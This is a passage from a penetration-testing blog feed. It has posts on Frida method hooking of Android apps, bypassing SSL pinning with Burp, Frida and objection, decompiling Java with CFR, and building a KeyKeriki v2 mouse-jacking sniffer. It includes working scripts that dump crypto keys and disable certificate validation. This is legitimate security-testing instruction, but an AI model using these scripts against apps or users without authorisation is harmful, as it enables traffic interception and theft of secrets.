class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[SharedPrefs] getString(</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">key</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">) = </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">value</span><span class="p">);</span> <span class="k">return</span> <span class="nx">value</span><span class="p">;</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>I’ve found API tokens, session IDs, and even passwords stored in plain text this way.</p> <h2 id="a-recon-script-to-get-you-started">A Recon Script to Get You Started</h2> <p>Here’s a script I use for initial app analysis. It hooks crypto, network calls, and logging all at once:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Starting recon...</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">SecretKeySpec</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">javax.crypto.spec.SecretKeySpec</span><span class="dl">"</span><span class="p">);</span> <span class="nx">SecretKeySpec</span><span class="p">.</span><span class="nx">$init</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">[B</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">algo</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[CRYPTO] Key created - Algorithm: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">algo</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[CRYPTO] Key bytes: </span><span class="dl">"</span> <span class="o">+</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nx">key</span><span class="p">));</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">$init</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">algo</span><span class="p">);</span> <span class="p">};</span> <span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">URL</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.net.URL</span><span class="dl">"</span><span class="p">);</span> <span class="nx">URL</span><span class="p">.</span><span class="nx">$init</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[NET] URL: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">url</span><span class="p">);</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">$init</span><span class="p">(</span><span class="nx">url</span><span class="p">);</span> <span class="p">};</span> <span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Log</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">android.util.Log</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Log</span><span class="p">.</span><span class="nx">d</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">tag</span><span class="p">,</span> <span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[LOG] </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">tag</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span><span class="p">);</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">d</span><span class="p">(</span><span class="nx">tag</span><span class="p">,</span> <span class="nx">msg</span><span class="p">);</span> <span class="p">};</span> <span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[*] Hooks installed. Use the app...</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span> <span class="p">});</span> <span class="kd">function</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nx">bytes</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">hex</span> <span class="o">=</span> <span class="p">[];</span> <span class="k">for </span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">bytes</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="nx">hex</span><span class="p">.</span><span class="nf">push</span><span class="p">((</span><span class="dl">'</span><span class="s1">0</span><span class="dl">'</span> <span class="o">+</span> <span class="p">(</span><span class="nx">bytes</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">).</span><span class="nf">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">)).</span><span class="nf">slice</span><span class="p">(</span><span class="o">-</span><span class="mi">2</span><span class="p">));</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">hex</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>Run it, then interact with the app and watch the secrets flow by.</p> <h2 id="tips-ive-learned">Tips I’ve Learned</h2> <p>A few things that have saved me time:</p> <ul> <li><strong>Start with static analysis</strong> — Use jadx or apktool to decompile the APK first. Find interesting classes before hooking blindly.</li> <li><strong>Wrap hooks in try/catch</strong> — If one hook fails it won’t crash your whole script.</li> <li><strong>Watch for obfuscation</strong> — Proguard renames classes to <code class="language-plaintext highlighter-rouge">a.b.c</code>. Look for string references to identify what’s what.</li> <li><strong>Hook constructors with <code class="language-plaintext highlighter-rouge">$init</code></strong> — Useful for seeing when objects get created and with what parameters.</li> <li><strong>Use Objection for quick wins</strong> — <code class="language-plaintext highlighter-rouge">objection -g com.app explore</code> is faster for initial recon.</li> </ul> <h2 id="whats-next">What’s Next</h2> <p>With Frida in your toolkit you can reverse engineer pretty much any Android app. Some things I use it for regularly:</p> <ul> <li>Reverse engineering proprietary API protocols</li> <li>Extracting hardcoded secrets and API keys</li> <li>Bypassing authentication and licensing checks</li> <li>Understanding obfuscated code through runtime analysis</li> <li>Dumping decrypted data before it hits the network</li> </ul> <p>In a future post I’ll cover hooking native libraries with Frida’s Interceptor API. That’s where things get really interesting.</p> <p>More to come!</p> Sat, 15 Nov 2025 20:00:00 +0000 https://www.marginaldeer.com//blog/frida-method-hooking-android/ https://www.marginaldeer.com//blog/frida-method-hooking-android/ android frida reverse-engineering pentest mobile blog Android SSL Pinning Bypass with Burp Suite <p>This post is a follow-up to my <a href="/blog/android-pentest-lab/">Android Pentest Lab Build</a> where we set up an emulated Android device. Now we’ll put that lab to use by intercepting HTTPS traffic from Android apps.</p> <p>If you’ve tried to proxy app traffic through Burp Suite before, you’ve probably run into SSL pinning. The app just refuses to connect or throws SSL errors everywhere. This is because modern apps embed the expected server certificate and reject anything else — including Burp’s CA. Great for security, annoying for us.</p> <p>Let’s break it.</p> <h2 id="what-youll-need">What You’ll Need</h2> <p>Before we begin, make sure you have:</p> <ul> <li>Android emulator from the <a href="/blog/android-pentest-lab/">previous post</a></li> <li><a href="https://portswigger.net/burp">Burp Suite</a> installed</li> <li>ADB working and in your PATH</li> <li><a href="https://frida.re/">Frida</a> (<code class="language-plaintext highlighter-rouge">pip install frida-tools</code>)</li> </ul> <h2 id="setting-up-burp">Setting Up Burp</h2> <p>First we need Burp to listen on all interfaces so the emulator can reach it. Go to <strong>Proxy &gt; Options</strong> and edit the listener. Set it to bind to “All interfaces” on port 8080.</p> <p><img src="/images/posts/2025/burp-listener-config.png" alt="Burp Listener Config" /></p> <h2 id="exporting-the-ca-certificate">Exporting the CA Certificate</h2> <p>We need to install Burp’s CA certificate on the Android device. In Burp, go to <strong>Proxy &gt; Options</strong> and click <strong>Import / export CA certificate</strong>. Select <strong>Certificate in DER format</strong> and save it as <code class="language-plaintext highlighter-rouge">burp-ca.der</code>.</p> <p>Now we need to convert it to a format Android expects:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl x509 <span class="nt">-inform</span> DER <span class="nt">-in</span> burp-ca.der <span class="nt">-out</span> burp-ca.pem <span class="nb">hash</span><span class="o">=</span><span class="si">$(</span>openssl x509 <span class="nt">-inform</span> PEM <span class="nt">-subject_hash_old</span> <span class="nt">-in</span> burp-ca.pem | <span class="nb">head</span> <span class="nt">-1</span><span class="si">)</span> <span class="nb">mv </span>burp-ca.pem <span class="k">${</span><span class="nv">hash</span><span class="k">}</span>.0 </code></pre></div></div> <h2 id="installing-as-a-system-certificate">Installing as a System Certificate</h2> <p>Here’s where it gets tricky. Android 7 and above don’t trust user-installed certificates for apps. We need to install it as a system certificate which requires root access.</p> <p>Start your emulator with a writable system partition:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>emulator <span class="nt">-avd</span> Pixel_API_25 <span class="nt">-writable-system</span> </code></pre></div></div> <p>Then push the certificate to the system store:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb root adb remount adb push <span class="k">${</span><span class="nv">hash</span><span class="k">}</span>.0 /system/etc/security/cacerts/ adb shell <span class="nb">chmod </span>644 /system/etc/security/cacerts/<span class="k">${</span><span class="nv">hash</span><span class="k">}</span>.0 adb reboot </code></pre></div></div> <p>After reboot, you can verify the certificate shows up in <strong>Settings &gt; Security &gt; Trusted credentials &gt; System</strong>.</p> <h2 id="configuring-the-proxy">Configuring the Proxy</h2> <p>Now we need to tell Android to route traffic through Burp:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb shell settings put global http_proxy <span class="si">$(</span><span class="nb">hostname</span> <span class="nt">-I</span> | <span class="nb">awk</span> <span class="s1">'{print $1}'</span><span class="si">)</span>:8080 </code></pre></div></div> <p>You can also do this manually in <strong>Settings &gt; Wi-Fi</strong> by long pressing your network and modifying the proxy settings.</p> <p>At this point browser traffic should flow through Burp. But apps with SSL pinning will still fail. Time to bring out the big guns.</p> <h2 id="setting-up-frida">Setting Up Frida</h2> <p>Download the Frida server for your emulator’s architecture. Most emulators are x86 or x86_64:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb shell getprop ro.product.cpu.abi wget https://github.com/frida/frida/releases/download/16.1.4/frida-server-16.1.4-android-x86.xz unxz frida-server-16.1.4-android-x86.xz </code></pre></div></div> <p>Push it to the device and run it:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb push frida-server-16.1.4-android-x86 /data/local/tmp/frida-server adb shell <span class="nb">chmod </span>755 /data/local/tmp/frida-server adb shell /data/local/tmp/frida-server &amp; </code></pre></div></div> <p>Verify Frida can see the device:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida-ps <span class="nt">-U</span> </code></pre></div></div> <p>You should see a list of running processes.</p> <h2 id="bypassing-ssl-pinning">Bypassing SSL Pinning</h2> <p>This is the easy part. <a href="https://github.com/sensepost/objection">Objection</a> is a toolkit built on Frida that makes SSL pinning bypass trivial.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip <span class="nb">install </span>objection </code></pre></div></div> <p>Find your target app’s package name:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida-ps <span class="nt">-Ua</span> </code></pre></div></div> <p>Launch it with SSL pinning disabled:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objection <span class="nt">-g</span> com.example.targetapp explore </code></pre></div></div> <p>Once inside the objection shell just run:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>android sslpinning disable </code></pre></div></div> <p>That’s it. Traffic should now flow through Burp without any SSL errors.</p> <h2 id="using-a-frida-script-instead">Using a Frida Script Instead</h2> <p>If you prefer doing things manually, save this as <code class="language-plaintext highlighter-rouge">ssl-bypass.js</code>:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">TrustManagerImpl</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">'</span><span class="s1">com.android.org.conscrypt.TrustManagerImpl</span><span class="dl">'</span><span class="p">);</span> <span class="nx">TrustManagerImpl</span><span class="p">.</span><span class="nx">verifyChain</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">untrustedChain</span><span class="p">,</span> <span class="nx">trustAnchorChain</span><span class="p">,</span> <span class="nx">host</span><span class="p">,</span> <span class="nx">clientAuth</span><span class="p">,</span> <span class="nx">ocspData</span><span class="p">,</span> <span class="nx">tlsSctData</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">[+] Bypassing SSL Pinning for: </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">host</span><span class="p">);</span> <span class="k">return</span> <span class="nx">untrustedChain</span><span class="p">;</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>Run it with:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>frida <span class="nt">-U</span> <span class="nt">-f</span> com.example.targetapp <span class="nt">-l</span> ssl-bypass.js <span class="nt">--no-pause</span> </code></pre></div></div> <h2 id="troubleshooting">Troubleshooting</h2> <p>Some common issues I’ve run into:</p> <ul> <li><strong>App crashes on launch with Frida</strong> — Might have Frida detection. Try using an older version or renaming the frida-server binary.</li> <li><strong>“Unable to connect to proxy”</strong> — Double check that Burp is listening on all interfaces and that you have the right IP in your proxy settings. It should be your host machine’s IP, not localhost.</li> <li><strong>Certificate not trusted</strong> — Make sure you installed it as a system cert, not a user cert. You need the <code class="language-plaintext highlighter-rouge">-writable-system</code> flag when launching the emulator.</li> </ul> <h2 id="whats-next">What’s Next</h2> <p>With traffic flowing through Burp you can start analyzing API endpoints and looking for vulnerabilities. The usual suspects I check for:</p> <ul> <li>Broken authentication and session management</li> <li>IDOR (Insecure Direct Object References)</li> <li>Sensitive data in API responses</li> <li>Hardcoded secrets in requests</li> <li>Missing rate limiting</li> </ul> <p>In my next post I’ll cover using Frida to hook specific methods and extract secrets from running apps.</p> <p>More to come!</p> Fri, 31 Oct 2025 20:00:00 +0000 https://www.marginaldeer.com//blog/android-ssl-pinning-bypass/ https://www.marginaldeer.com//blog/android-ssl-pinning-bypass/ android burp ssl pentest mobile blog Decompiling Java Applications with CFR <p>Starting a new series on Java application security. I do a lot of web app assessments and many of them involve Java backends — Spring apps, Tomcat deployments, fat JARs, the works. Being able to decompile and read the source is invaluable for finding vulnerabilities that black-box testing misses.</p> <p>My go-to decompiler is <a href="https://www.benf.org/other/cfr/">CFR</a>. It handles modern Java well, produces readable output, and runs from the command line which makes it easy to script. Let’s get into it.</p> <h2 id="why-decompile">Why Decompile?</h2> <p>When you’re pentesting a Java web app you often have access to:</p> <ul> <li>WAR/JAR files from the deployment</li> <li>Class files extracted from a running server</li> <li>Client-side Java applets (increasingly rare but still around)</li> <li>Android APKs (Dalvik bytecode converts back to Java)</li> </ul> <p>Decompilation lets you see the actual business logic, find hardcoded secrets, trace authentication flows, and identify vulnerable code patterns. It’s the difference between guessing and knowing.</p> <h2 id="getting-cfr">Getting CFR</h2> <p>CFR is a single JAR file with no dependencies. Grab it from the official site or use the Maven artifact:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://www.benf.org/other/cfr/cfr-0.152.jar </code></pre></div></div> <p>That’s it. No installation, no setup.</p> <h2 id="basic-usage">Basic Usage</h2> <p>Decompile a single class file:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>java <span class="nt">-jar</span> cfr-0.152.jar MyClass.class </code></pre></div></div> <p>Output goes to stdout by default. For a whole JAR:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>java <span class="nt">-jar</span> cfr-0.152.jar application.jar <span class="nt">--outputdir</span> ./decompiled </code></pre></div></div> <p>This extracts and decompiles everything into a nice directory structure matching the package hierarchy.</p> <h2 id="dealing-with-war-files">Dealing with WAR Files</h2> <p>Web applications come packaged as WAR files. These are just ZIP archives with a specific structure:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>myapp.war ├── META-INF/ ├── WEB-INF/ │ ├── classes/ &lt;- Compiled application code │ ├── lib/ &lt;- Dependency JARs │ └── web.xml &lt;- Deployment descriptor └── (static files) </code></pre></div></div> <p>The interesting stuff is in <code class="language-plaintext highlighter-rouge">WEB-INF/classes</code> and sometimes <code class="language-plaintext highlighter-rouge">WEB-INF/lib</code> if the app bundles vulnerable dependencies.</p> <p>Here’s my workflow:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Extract the WAR</span> unzip <span class="nt">-q</span> myapp.war <span class="nt">-d</span> myapp_extracted <span class="c"># Decompile the application classes</span> java <span class="nt">-jar</span> cfr-0.152.jar myapp_extracted/WEB-INF/classes <span class="nt">--outputdir</span> ./decompiled <span class="c"># If you need to dig into a dependency</span> java <span class="nt">-jar</span> cfr-0.152.jar myapp_extracted/WEB-INF/lib/some-lib.jar <span class="nt">--outputdir</span> ./decompiled_lib </code></pre></div></div> <h2 id="useful-cfr-options">Useful CFR Options</h2> <p>CFR has a ton of options for handling edge cases. These are the ones I use most:</p> <ul> <li><code class="language-plaintext highlighter-rouge">--outputdir &lt;path&gt;</code> — Write output to files instead of stdout</li> <li><code class="language-plaintext highlighter-rouge">--caseinsensitivefs true</code> — Helps on Windows where filenames are case-insensitive</li> <li><code class="language-plaintext highlighter-rouge">--silent true</code> — Suppress progress messages</li> <li><code class="language-plaintext highlighter-rouge">--comments false</code> — Skip the CFR comment header in output files</li> <li><code class="language-plaintext highlighter-rouge">--decodestringswitch false</code> — Sometimes helps with obfuscated code</li> <li><code class="language-plaintext highlighter-rouge">--sugarasserts false</code> — Can help with weird assertion patterns</li> </ul> <p>For obfuscated code:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>java <span class="nt">-jar</span> cfr-0.152.jar obfuscated.jar <span class="se">\</span> <span class="nt">--outputdir</span> ./decompiled <span class="se">\</span> <span class="nt">--renameillegalidents</span> <span class="nb">true</span> <span class="se">\</span> <span class="nt">--renamesmallmembers</span> 4 </code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">renameillegalidents</code> flag handles classes with names that aren’t valid Java identifiers (common in obfuscated code).</p> <h2 id="reading-the-output">Reading the Output</h2> <p>CFR produces pretty clean Java. It handles:</p> <ul> <li>Lambda expressions</li> <li>Try-with-resources</li> <li>Switch expressions (newer Java)</li> <li>Generics (mostly)</li> <li>Inner classes</li> </ul> <p>Sometimes you’ll see comments like <code class="language-plaintext highlighter-rouge">/* synthetic */</code> or <code class="language-plaintext highlighter-rouge">/* bridge */</code> — these are compiler-generated methods you can usually ignore.</p> <p>If you see variable names like <code class="language-plaintext highlighter-rouge">var1</code>, <code class="language-plaintext highlighter-rouge">var2</code>, the original names were stripped. You’ll need to figure out what they represent from context.</p> <h2 id="a-quick-automation-script">A Quick Automation Script</h2> <p>I wrote a simple wrapper for bulk decompilation:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span> <span class="c"># decompile.sh - Bulk decompile Java artifacts</span> <span class="nv">CFR_JAR</span><span class="o">=</span><span class="s2">"</span><span class="nv">$HOME</span><span class="s2">/tools/cfr-0.152.jar"</span> <span class="nv">OUTPUT_BASE</span><span class="o">=</span><span class="s2">"./decompiled"</span> <span class="k">for </span>artifact <span class="k">in</span> <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span><span class="p">;</span> <span class="k">do </span><span class="nv">name</span><span class="o">=</span><span class="si">$(</span><span class="nb">basename</span> <span class="s2">"</span><span class="nv">$artifact</span><span class="s2">"</span> | <span class="nb">sed</span> <span class="s1">'s/\.[^.]*$//'</span><span class="si">)</span> <span class="nv">outdir</span><span class="o">=</span><span class="s2">"</span><span class="nv">$OUTPUT_BASE</span><span class="s2">/</span><span class="nv">$name</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">"[*] Decompiling </span><span class="nv">$artifact</span><span class="s2"> -&gt; </span><span class="nv">$outdir</span><span class="s2">"</span> <span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$artifact</span><span class="s2">"</span> <span class="o">==</span> <span class="k">*</span>.war <span class="o">]]</span><span class="p">;</span> <span class="k">then </span><span class="nv">tmpdir</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span> unzip <span class="nt">-q</span> <span class="s2">"</span><span class="nv">$artifact</span><span class="s2">"</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$tmpdir</span><span class="s2">"</span> java <span class="nt">-jar</span> <span class="s2">"</span><span class="nv">$CFR_JAR</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$tmpdir</span><span class="s2">/WEB-INF/classes"</span> <span class="se">\</span> <span class="nt">--outputdir</span> <span class="s2">"</span><span class="nv">$outdir</span><span class="s2">"</span> <span class="nt">--silent</span> <span class="nb">true rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$tmpdir</span><span class="s2">"</span> <span class="k">else </span>java <span class="nt">-jar</span> <span class="s2">"</span><span class="nv">$CFR_JAR</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$artifact</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">--outputdir</span> <span class="s2">"</span><span class="nv">$outdir</span><span class="s2">"</span> <span class="nt">--silent</span> <span class="nb">true </span><span class="k">fi done </span><span class="nb">echo</span> <span class="s2">"[+] Done"</span> </code></pre></div></div> <p>Usage:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./decompile.sh app1.war app2.jar lib.jar </code></pre></div></div> <h2 id="what-to-look-for">What to Look For</h2> <p>Once you have decompiled source, you’re looking for security issues. In future posts I’ll cover specific vulnerability patterns, but here’s a quick hit list:</p> <ul> <li><strong>Hardcoded credentials</strong> — Database passwords, API keys, encryption keys</li> <li><strong>SQL queries</strong> — String concatenation instead of prepared statements</li> <li><strong>Deserialization</strong> — ObjectInputStream.readObject() calls</li> <li><strong>Path traversal</strong> — File operations with user input</li> <li><strong>Command injection</strong> — Runtime.exec() or ProcessBuilder with user data</li> <li><strong>XXE</strong> — XML parsers without secure configuration</li> <li><strong>SSRF</strong> — HTTP clients making requests to user-controlled URLs</li> <li><strong>Weak crypto</strong> — MD5, SHA1 for passwords, ECB mode, hardcoded IVs</li> </ul> <p>Grep is your friend:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Find potential SQL injection</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s2">"createStatement</span><span class="se">\|</span><span class="s2">executeQuery</span><span class="se">\|</span><span class="s2">executeUpdate"</span> ./decompiled <span class="c"># Find hardcoded passwords</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="nt">-i</span> <span class="s2">"password</span><span class="se">\s</span><span class="s2">*=</span><span class="se">\s</span><span class="s2">*</span><span class="se">\"</span><span class="s2">"</span> ./decompiled <span class="c"># Find deserialization</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s2">"ObjectInputStream</span><span class="se">\|</span><span class="s2">readObject"</span> ./decompiled <span class="c"># Find command execution</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s2">"Runtime.getRuntime().exec</span><span class="se">\|</span><span class="s2">ProcessBuilder"</span> ./decompiled </code></pre></div></div> <h2 id="cfr-vs-other-decompilers">CFR vs Other Decompilers</h2> <p>I’ve tried most of the popular Java decompilers:</p> <ul> <li><strong>JD-GUI</strong> — GUI-based, good for quick looks but the decompiler is dated</li> <li><strong>Procyon</strong> — Solid alternative to CFR, sometimes handles edge cases differently</li> <li><strong>Fernflower</strong> — Built into IntelliJ, good quality but harder to use standalone</li> <li><strong>JADX</strong> — My go-to for Android APKs, includes dex2jar conversion</li> <li><strong>Krakatau</strong> — Handles weird bytecode that breaks other decompilers</li> </ul> <p>I keep coming back to CFR because it’s reliable, actively maintained, and the CLI makes it easy to integrate into workflows. When CFR fails on something I’ll try Procyon or Krakatau.</p> <h2 id="tips-ive-learned">Tips I’ve Learned</h2> <p>A few things that save time:</p> <ul> <li><strong>Keep the original structure</strong> — Don’t flatten the package hierarchy. You’ll need it to understand the architecture.</li> <li><strong>Decompile dependencies selectively</strong> — Don’t decompile all of <code class="language-plaintext highlighter-rouge">WEB-INF/lib</code> unless you need to. Focus on app code first.</li> <li><strong>Compare versions</strong> — If you can get multiple versions of an app, diff them to find recent changes (often security fixes).</li> <li><strong>Check web.xml</strong> — The deployment descriptor shows URL mappings, filters, and servlets. Good roadmap for the codebase.</li> <li><strong>Look at pom.xml or build.gradle</strong> — If included, these show dependencies and versions. Check for known CVEs.</li> </ul> <h2 id="whats-next">What’s Next</h2> <p>This post covered the basics of getting Java source from compiled artifacts. In the next post we’ll dig into finding SQL injection vulnerabilities through code analysis — building patterns to identify injectable queries even in large codebases.</p> <p>More to come!</p> Sat, 18 Oct 2025 20:00:00 +0000 https://www.marginaldeer.com//blog/java-decompilation-cfr/ https://www.marginaldeer.com//blog/java-decompilation-cfr/ java reverse-engineering decompilation cfr pentest blog KeyKerikiv2 Build: Part 1 <p>For a long time I’ve wanted to take a look at the hardware side of things in the hacking industry. Throughout the years I’ve tinkered with conference badges, but never had an understanding of the amount of time required to develop such devices. With virtually no guidance I decided to jump right into a project.</p> <p>The project I’ve chosen is to build a <a href="http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/">KeyKeriki v2</a>.</p> <p>The primary reasons I’ve chosen this project is because on recent engagements I’ve relied on mouse jacking to gain an intial foothold and the project seemed more low level than starting with an arduino. I learn best by being thrown into the scrum and I found the lack of how-to’s a huge challenge for myself.</p> <p>Looking at the remote-exploit site there is more than enough required for someone with experience to build this. The schematic, board layout and presentation slides are provided which I reviewed.</p> <p><img src="/images/posts/2019/remote_exploit_files_avail.png" alt="Keykeriki_docs" /></p> <p>After some googling on how to open the schematic and board files I stumbled across JLCPCB and their Easy EDA tool. This web application allowed me to open the schematic and board files. Looking at these files I was overwhelmed and barely had an idea of what I was looking at.</p> <p><img src="/images/posts/2019/easy_eda_board.png" alt="Keykeriki_board_file" /></p> <p>So, without modifications I decided to just submit the boards to JLCPCB for printing. No idea if this will even work, but with the low cost of getting these printed it seemed worth a shot. I ordered a total of 10 boards.</p> <p>Conveniently, JLCPCB also allows you to create a Bill of Materials or BOM. This file contains all of the components required to build the project.</p> <p><img src="/images/posts/2019/BOM.png" alt="Keykeriki_BOM_list" /></p> <p>This is where the fun began as just ordering the correct components turned out to be more difficult then I expected. There are so many different form-factors, manufacturers and part numbers that just submitting the BOM from the project produced a ton of “No match found” results. After hours of research I ended up placing multiple orders through LCSC (JLCPCB’s component side) and also through Digi-Key since all the parts were not available through one site.</p> <p><img src="/images/posts/2019/BOM_no_match_found.png" alt="LCSC_Component_match_issues" /></p> <p>There were two parts that I could not find on either site and relied heavily on the images from the presentation to distiguish what these parts were. The two parts were the 2.4Ghz radios and without these the project would be useless. I was able to find the nRF24L01+ module at sparkfun.com with ease.</p> <p><img src="/images/posts/2019/sparkfun_nrf24.png" alt="SparkFun.com_nrf24_module_rp-sma" /></p> <p>The MD7125-F02 module was next to impossible to locate. Taking a chance I submitted a query for the devices to a foreign site. The module they appeared to carry wasn’t an exact match because it does not contain an RP-SMA connector, but it did appear to have the pads available to where I could add one.</p> <p><img src="/images/posts/2019/MD7125_inquery.png" alt="MD7125_inquery" /></p> <p>I have yet to receive a response, but I am hopeful. Without this module I don’t think I can complete the project so if I do not hear a response back I will attempt to find it other places.</p> <p>As expected, the PCBs will be shipping from China and should arrive in the next few days. While I am awaiting the PCBs and components I plan to further research surface mount soldering techniques, 